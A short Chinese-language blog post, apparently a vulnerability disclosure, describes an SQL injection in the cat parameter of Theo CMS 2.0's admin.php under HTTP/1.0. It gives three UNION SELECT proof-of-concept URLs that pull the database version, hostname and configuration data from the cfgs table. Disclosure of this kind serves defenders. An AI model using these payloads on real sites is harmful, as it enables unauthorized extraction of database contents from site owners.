AD

Theo_CMS2.0_SQLInjection

产品介绍

         Theo是一个可以用于多种网站的,超轻量级的内容管理系统(CMS

漏洞介绍

         漏洞出现的地方位于使用管理员登录系统的时候,在使用HTTP1.0协议进行访问该应用,admin.php页面的cat变量存在SQL注入漏洞。

POC

/theocms/core/admin.php?cat=0+union+select+1,@@version,3,4+from+cfgs
/theocms/core/admin.php?cat=0+union+select+1,@@hostname,3,4+from+cfgs

/theocms/core/admin.php?cat=0+union+select+1,concat(cfg,data),3,4+from+cfgs

评论

此博客中的热门博文

简单粗暴导出小米便签

我——终于一个人了

Ubiquiti_Networks_UniFi_Cloud_Key_authed_rce